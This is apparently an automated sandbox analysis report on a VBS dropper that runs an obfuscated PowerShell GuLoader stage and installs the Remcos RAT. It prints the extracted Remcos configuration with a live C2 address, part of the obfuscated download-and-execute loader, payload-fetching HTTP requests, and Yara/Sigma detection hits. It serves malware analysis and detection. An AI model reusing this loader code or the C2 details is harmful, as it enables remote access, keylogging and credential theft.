CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 8 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_720.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7368.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xef55:$b2: ::FromBase64String(
                • 0xdfd3:$s1: -join
                • 0x13347:$s3: Reverse
                • 0x777f:$s4: +=
                • 0x7841:$s4: +=
                • 0xba68:$s4: +=
                • 0xdb85:$s4: +=
                • 0xde6f:$s4: +=
                • 0xdfb5:$s4: +=
                • 0x1806d:$s4: +=
                • 0x180ed:$s4: +=
                • 0x181b3:$s4: +=
                • 0x18233:$s4: +=
                • 0x18409:$s4: +=
                • 0x1848d:$s4: +=
                • 0xe7fa:$e4: Get-WmiObject
                • 0xe9e9:$e4: Get-Process
                • 0xea41:$e4: Start-Process
                • 0x18cf7:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 4084, ProcessName: wscript.exe
                Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", CommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Windows Mail\wab.exe, NewProcessName: C:\Program Files (x86)\Windows Mail\wab.exe, OriginalFileName: C:\Program Files (x86)\Windows Mail\wab.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7732, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl", ProcessId: 7928, ProcessName: wab.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs", ProcessId: 4084, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.rurenaVekslerlOttom nePassersoMent lha BallisnVivarii

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Windows Mail\wab.exe, ProcessId: 7732, TargetFilename: C:\ProgramData\remcos\logs.dat

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2530030312.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2549178536.0000000008B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7732, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_245710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_245710F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24576580 FindFirstFileExA,17_2_24576580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 103.237.87.32
                Source: global trafficTCP traffic: 192.168.2.7:49708 -> 103.237.87.32:1999
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
                Source: global trafficHTTP traffic detected: GET /Teentsier.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mbLXhRfFSSN77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: unknownTCP traffic detected without corresponding DNS query: 103.237.86.247
                Source: global trafficHTTP traffic detected: GET /Teentsier.lpk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mbLXhRfFSSN77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: wab.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: wab.exe, 00000011.00000002.2561134247.00000000249C0000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.2
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.23
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.8
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1870759337.0000019E81AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/T
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Te
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Tee
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teen
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teent
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teents
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsi
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsie
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.l
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.lp
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.lpk
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.lpkP
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Teentsier.lpkXR
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.bin
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/mbLXhRfFSSN77.binH
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E81E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: wscript.exe, 00000000.00000003.1240291201.0000029D2C485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/P=
                Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A586000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1251228154.0000029D2A586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1240544273.0000029D2C472000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf0730a6
                Source: wscript.exe, 00000000.00000002.1251228154.0000029D2A54E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250082631.0000029D2A53F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1250273073.0000029D2A542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enh
                Source: wscript.exe, 00000000.00000003.1240917817.0000029D2A59B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1241218710.0000029D2A5C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e2409bf073
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2549178536.0000000008AB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpG
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpS
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpi
                Source: wab.exe, 00000011.00000002.2549178536.0000000008AF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj
                Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: wab.exeString found in binary or memory: http://www.ebuddy.com
                Source: wab.exeString found in binary or memory: http://www.imvu.com
                Source: wab.exeString found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000E.00000002.1714276170.00000000048D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000E.00000002.1714276170.0000000004A2B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.1870759337.0000019E812A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1716933830.000000000593B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: wab.exeString found in binary or memory: https://www.google.com
                Source: wab.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0041183A OpenClipboard,GetLastError,DeleteFileW,20_2_0041183A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,20_2_0040987A
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004098E2
